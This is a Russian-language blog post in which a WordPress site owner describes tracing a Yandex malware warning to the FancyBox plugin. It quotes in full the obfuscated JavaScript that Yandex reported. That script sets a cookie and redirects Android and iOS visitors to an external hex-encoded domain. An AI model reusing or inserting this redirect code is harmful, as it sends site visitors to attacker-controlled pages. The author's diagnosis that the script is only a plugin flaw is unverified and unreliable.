Последние несколько дней выдались жаркими и пришлось  2 дня ковыряться в коде своего блога в поисках вируса, которого, как оказалось и нет, а вся проблемы была связана с тем, что разработчик нашел уязвимость в собственном плагине FancyBox для WP, но обо всем по порядку...

Несколько дней назад, я получил письмо от сервиса Яндекс Вебмастер о том, что мой сайт является потенциально опасным, так как имеет некий вредоносный код. Просканировав все файлы своего  сайта  антивирусом Dr.Web и программой для поиска троянов Trojan Remover , но  к сожалению ничего не нашел, файлы были абсолютно чистыми. Это означало, что придется либо нанять программиста заплатив ему денег  или разбираться самому, чтобы в дальнейшем не платить снова, если возникнет  такая проблема и понимать, что же на самом деле является ее причиной. Так как легких путей мы не ищем)) я выбрал второй вариант и погрузился в изучение форумов так как ранее опыта в решении подобных задач у меня не было.

Начал с самого просто  переустановил более ранние BackUp-ы  у хостера, но это не помогло, обновил все возможные плагины и сам движок WP до последней версии 4.1.1 тоже не помогло.Кстати движок очень глючный часть функций не работает так что не рекомендую обновлять до него.

Затем на одном их форумов я прочел, что вредоносный код создает дополнительную ссылку на инфицированный файл, в  файлах  с расширением php  и что, если код на обнаружен в файлах загрузки то нужно просмотреть ВСЕ файлы в ручную,  но что  и было потрачено 80% моего времени)) Все файлы оказались чистыми..  Меня  начала уносить тройка с бубенцами )) Но сдаваться не хотел..

Тогда я решил пойти методом от обратно: узнав сперва название трояна и вид вредоносного кода а затем уже искать его и методы лечения.

Для этого я  запросил у сервиса Яндекс Вебмастер вид вредоносного кода мне его прислали и узнал название Troj/JSRedir-QG:

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

<script>var _0x26ee=["\x74\x64\x73\x6B\x6A","\x74\x65\x73\x74\x63\x6F\x6F\x6B\x69\x65","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x65\x79\x66\x67\x69\x77\x65\x2E\x69\x67\x6E\x6F\x72\x65\x6C\x69\x73\x74\x2E\x63\x6F\x6D\x2F\x65\x30\x32\x7A","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x65\x79\x66\x67\x69\x77\x65\x2E\x69\x67\x6E\x6F\x72\x65\x6C\x69\x73\x74\x2E\x63\x6F\x6D\x2F\x65\x30\x32\x44","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];var x=readCookie(_0x26ee[0]);if(!x){createCookie(_0x26ee[0],_0x26ee[1],1);if(navigator[_0x26ee[3]][_0x26ee[2]](/Android/i)){window[_0x26ee[4]]=_0x26ee[5]}else {if(navigator[_0x26ee[3]][_0x26ee[2]](/iPhone|iPad|iPod/i)){window[_0x26ee[4]]=_0x26ee[6]}};};function createCookie(_0x7af0x3,_0x7af0x4,_0x7af0x5){if(_0x7af0x5){var _0x7af0x6= new Date();_0x7af0x6[_0x26ee[8]](_0x7af0x6[_0x26ee[7]]()+(_0x7af0x5*24*60*60*1000));var _0x7af0x7=_0x26ee[9]+_0x7af0x6[_0x26ee[10]]();}else {var _0x7af0x7=_0x26ee[11]};document[_0x26ee[12]]=_0x7af0x3+_0x26ee[13]+_0x7af0x4+_0x7af0x7+_0x26ee[14];}function readCookie(_0x7af0x3){var _0x7af0x9=_0x7af0x3+_0x26ee[13];var _0x7af0xa=document[_0x26ee[12]][_0x26ee[16]](_0x26ee[15]);for(var _0x7af0xb=0;_0x7af0xb<_0x7af0xa[_0x26ee[17]];_0x7af0xb++){var _0x7af0xc=_0x7af0xa[_0x7af0xb];while(_0x7af0xc[_0x26ee[19]](0)==_0x26ee[20]){_0x7af0xc=_0x7af0xc[_0x26ee[18]](1,_0x7af0xc[_0x26ee[17]])};if(_0x7af0xc[_0x26ee[21]](_0x7af0x9)==0){return _0x7af0xc[_0x26ee[18]](_0x7af0x9[_0x26ee[17]],_0x7af0xc[_0x26ee[17]])};};return null;}</script>

Теперь было проще, враг идентифицирован и можно начинать его поиски ) Но тут я столкнулся с другой проблемой изучив библиотеку безопасности сайта Яндекс Вебмастер на не обнаружил там такого трояна!

Погуглив я тоже ничего не нашел,  варианта оставалось два или это новый неизвестный троян  или я что-то делаю не так.

На одном из форумов я нашел алгоритм поиска вирусов на сайте и применил его у себя. Главная фишка заключается в том, чтобы запустить свой сайт через  браузер Google Chrome  и использовать консоль "инструменты разработчика", которая позволяет просмотреть код любого сайта в режиме реального времени т.е тогда когда он работает и соответственно видны все процессы. Как раз именно через него я и обнаружил что самым вредоносный код, который мне прислали с Яндекс Вебмастер генерировал .js файл плагина Fancy Box для WP.  Cразу полегчало так как проблема была обнаружена и осталось только устранить ее!

Отключил временно плагин, который за них отвечает Fancy Box  и который как раз и генерировал данный вредоносный код, а точнее уязвимость которая могла быть использована злоумышленниками в будущем.

Затем загуглил в поисковике "уязвимость  плагина Fancy Box"  и  все подтвердилось. Буквально в начале февраля была обнаружена данная уязвимость нулевого дня из-за который и был весь сыр бор.

Поэтому временно будем без картинок, хотя автор данного плагина уже написал что устранил так называемую уязвимость нулевого дня, которая там присутствовал изначально, но только после того как разработчики антивируса одной из  иностранных компаний ее выявили и занесли в базу сработала защита  Яндекса, которая скорее всего обращаться к данной базе данных.  Все остальные разработчики антивирусов на данный момент не считают ее проблемой. У всех остальных мой  сайт чист можете проверить сами на ресурсе Dr.Web

Вот результаты сканирования моего сайта   Просмотреть

Отправил так же письмо в Яндекс, чтобы сняли пометку об угрозе с моего сайта.  Надеюсь моя статься будет кому-то полезна, так как кто-то еще мог столкнуться с данной проблемой!